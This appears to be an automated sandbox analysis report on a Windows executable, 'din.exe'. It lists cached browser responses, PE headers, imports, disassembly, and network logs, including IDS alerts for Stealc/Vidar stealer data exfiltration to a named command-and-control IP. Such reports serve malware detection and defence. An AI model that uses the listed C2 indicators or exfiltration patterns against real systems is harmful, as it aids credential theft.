                                                                                                                                                                                                                                                                                      Size (bytes):962
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                      MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                      SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                      SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                      SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                      Chrome Cache Entry: 457

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (6378)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):6383
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.785249513102167
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:hxvN6666VziSiFY67LOYdH+UbfY+PKHbV6HF9qZ:hxF6666gSiFP7L7VH5HFy
                                                                                                                                                                                                                                                                                      MD5:DC672535E8F6761D31AAA4A2E17B6239
                                                                                                                                                                                                                                                                                      SHA1:F4845C280D88B004308FF98A9D9EDE3C988B2709
                                                                                                                                                                                                                                                                                      SHA-256:F1681EEE1B2BC519E5C9F36EF9222658E7724F84DA7918B80C3FB3FAA3E15DD4
                                                                                                                                                                                                                                                                                      SHA-512:950C20175976013B0BD7B948089BF18B57CF0C55FA82D1D3CD66436367B387083A061916DFA01C42E6B8FDFF74DD08D6CF5B8930D8209E1368A490CBE8D4A59E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                      Preview:)]}'.["",["the twilight saga","united airlines body found in wheel well","epic games store free games","philadelphia phillies","nyt strands december 26","tiny brick oven pizza dave portnoy","aurora borealis northern lights forecast","nintendo switch 2 console"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"CgovbS8wOWdqbXZ3EgtGaWxtIHNlcmllczKPD2RhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWFBQUFDQXdFQkFBQUFBQUFBQUFBQUFBQUZCZ01FQndJQi84UUFOaEFBQWdFQ0JBTUdBd1lIQVFBQUFBQUFBUUlEQkJFQUJSSWhFekZCQmlKUllYR1JCeFNCSXpLaHNjSFNVbk9Da3BQUjRSWC94QUFYQVFFQkFRRUFBQUFBQUFB

                                                                                                                                                                                                                                                                                      Chrome Cache Entry: 458

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                      MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                      SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                      SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                      SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                      Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                      Chrome Cache Entry: 459

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):132723
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.436566478203261
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:fekJQ7O4N5dTm+syHEt4W3XdQ4Q6SuSr/nUW2i6o:f/Q7HTt/sHdQ4Q6SDfUW8o
                                                                                                                                                                                                                                                                                      MD5:0EA8E0CEB0AD45C5A3FCC3230095F73B
                                                                                                                                                                                                                                                                                      SHA1:D5FC5EDC5735CF863AC4B45562A871BFF2DCC027
                                                                                                                                                                                                                                                                                      SHA-256:429D59E7F75EFBEA6F74E7DCA1CBC1179ACE282C730908CC3650E4ADA26CCAFB
                                                                                                                                                                                                                                                                                      SHA-512:07FF131BDF835904AB108F41763963FEAEDA032473D3A832719CB18AA78E6D4EA6DDCE0D0CE49546C26DF4ABB436FE2F63B7E5D930E214D0AA1120DE3B66ABA5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                      Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.962234251074959
                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                      File name:din.exe
                                                                                                                                                                                                                                                                                      File size:1'224'479 bytes
                                                                                                                                                                                                                                                                                      MD5:ce76b7cda29a7ea80917e5844a7fca42
                                                                                                                                                                                                                                                                                      SHA1:c9a7eeb65056f6743b3a43ca0a7010743003191f
                                                                                                                                                                                                                                                                                      SHA256:88bced6d92559b9ea1974fd4329868e68c104eb58a976d65b9df8af32bbd2400
                                                                                                                                                                                                                                                                                      SHA512:400decdd792a254527fcd5baec0da3c48a4d70f734a1702acb0bb374f515ebe92f2d56c9706fe9a2b59fded5525e4257d624a3be9875147e04a199eb38097cf0
                                                                                                                                                                                                                                                                                      SSDEEP:24576:qW4acYhfuPcbJPltiliv/7GFO5n1BGbJEL0YmTj0RXJJd196ebMic:hvgkhrNpiJA4ANd191y
                                                                                                                                                                                                                                                                                      TLSH:F84523994B904C62EA99DF7572F8EA311F36B1626478CA6FE700844D7B903438D6CB63
                                                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                                                      Icon Hash:bcfc9930d2d8b074

                                                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                      Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                      Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                                                      Authenticode Signature

                                                                                                                                                                                                                                                                                      Signature Valid:false
                                                                                                                                                                                                                                                                                      Signature Issuer:CN=DigiCert Assured ID Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                                                                                                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                      Error Number:-2146869232
                                                                                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                                                                                      • 17/01/2016 19:00:00 27/03/2019 08:00:00
                                                                                                                                                                                                                                                                                      Subject Chain
                                                                                                                                                                                                                                                                                      • CN=Hamrick Software, O=Hamrick Software, L=Sunny Isles Beach, S=Florida, C=US
                                                                                                                                                                                                                                                                                      Version:3
                                                                                                                                                                                                                                                                                      Thumbprint MD5:EED0330F674889C759718E9634C7CFBE
                                                                                                                                                                                                                                                                                      Thumbprint SHA-1:72DA31A1E39FF2688E01CC9246F9655C5479DC44
                                                                                                                                                                                                                                                                                      Thumbprint SHA-256:2F0E03F8BCDEEFFF96E71C8AFD36F929E0DABD73E2991FF44A5F571DE8BC4D20
                                                                                                                                                                                                                                                                                      Serial:0E3580050E04BCD215040A908ECA4FCA

                                                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                                                      sub esp, 000002D4h
                                                                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                                                                      push edi
                                                                                                                                                                                                                                                                                      push 00000020h
                                                                                                                                                                                                                                                                                      xor ebp, ebp
                                                                                                                                                                                                                                                                                      pop esi
                                                                                                                                                                                                                                                                                      mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                      mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                      mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                      call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                      push 00008001h
                                                                                                                                                                                                                                                                                      call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                      call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                      push 00000008h
                                                                                                                                                                                                                                                                                      mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                      call 00007FA3D8DC4F6Bh
                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                      push 000002B4h
                                                                                                                                                                                                                                                                                      mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                      lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                      push 0040A264h
                                                                                                                                                                                                                                                                                      call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                      push 0040A24Ch
                                                                                                                                                                                                                                                                                      push 00476AA0h
                                                                                                                                                                                                                                                                                      call 00007FA3D8DC4C4Dh
                                                                                                                                                                                                                                                                                      call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                                      mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                      push edi
                                                                                                                                                                                                                                                                                      call 00007FA3D8DC4C3Bh
                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                      call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                      cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                      mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                      mov eax, edi
                                                                                                                                                                                                                                                                                      jne 00007FA3D8DC253Ah
                                                                                                                                                                                                                                                                                      push 00000022h
                                                                                                                                                                                                                                                                                      pop esi
                                                                                                                                                                                                                                                                                      mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                                      call 00007FA3D8DC4911h
                                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                                      call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                      mov esi, eax
                                                                                                                                                                                                                                                                                      mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                      jmp 00007FA3D8DC25C3h
                                                                                                                                                                                                                                                                                      push 00000020h
                                                                                                                                                                                                                                                                                      pop ebx
                                                                                                                                                                                                                                                                                      cmp ax, bx
                                                                                                                                                                                                                                                                                      jne 00007FA3D8DC253Ah
                                                                                                                                                                                                                                                                                      add esi, 02h
                                                                                                                                                                                                                                                                                      cmp word ptr [esi], bx

                                                                                                                                                                                                                                                                                      Rich Headers

                                                                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                      • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                      • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                      • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x5a342.rsrc
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1275370x39e8.rsrc
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                      .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                      .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                      .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      .rsrc0x1000000x5a3420x5a40026ea09d48a2eaa1f786b0086be8bbd2fFalse0.9800359245152355data7.907321967358554IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                      .reloc0x15b0000xfd60x1000ebc94dee2e0cd4d78ba78d353ac504c3False0.596923828125data5.583176154022744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                      RT_ICON0x1002500x4cbc5PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.993204139875091
                                                                                                                                                                                                                                                                                      RT_ICON0x14ce180x7d20PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004995004995005
                                                                                                                                                                                                                                                                                      RT_ICON0x154b380x279bPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0010849196173193
                                                                                                                                                                                                                                                                                      RT_ICON0x1572d40x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5777054515866559
                                                                                                                                                                                                                                                                                      RT_ICON0x15993c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7039007092198581
                                                                                                                                                                                                                                                                                      RT_DIALOG0x159da40x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                                      RT_DIALOG0x159ea40x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                                      RT_DIALOG0x159fc00x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                                      RT_GROUP_ICON0x15a0200x4cdataEnglishUnited States0.8026315789473685
                                                                                                                                                                                                                                                                                      RT_MANIFEST0x15a06c0x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                                                      KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                                      USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                                      SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                                      ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                                      VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                      2024-12-27T07:09:58.205436+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.749771188.245.216.205443TCP
                                                                                                                                                                                                                                                                                      2024-12-27T07:10:03.389881+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1188.245.216.205443192.168.2.749781TCP
                                                                                                                                                                                                                                                                                      2024-12-27T07:10:06.124006+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.749782188.245.216.205443TCP
                                                                                                                                                                                                                                                                                      2024-12-27T07:10:06.124264+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11188.245.216.205443192.168.2.749782TCP

                                                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:11.302531004 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:11.302529097 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:11.474401951 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:14.992918015 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:15.365037918 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:16.115025997 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:17.615041018 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:20.599421024 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:20.911927938 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:20.911933899 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:21.080260038 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:24.167433977 CET44349701104.98.116.138192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:24.168121099 CET49701443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:26.552598000 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:38.474453926 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:51.038332939 CET49760443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:51.038383007 CET44349760149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:51.038465023 CET49760443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:51.048640966 CET49760443192.168.2.7149.154.167.99
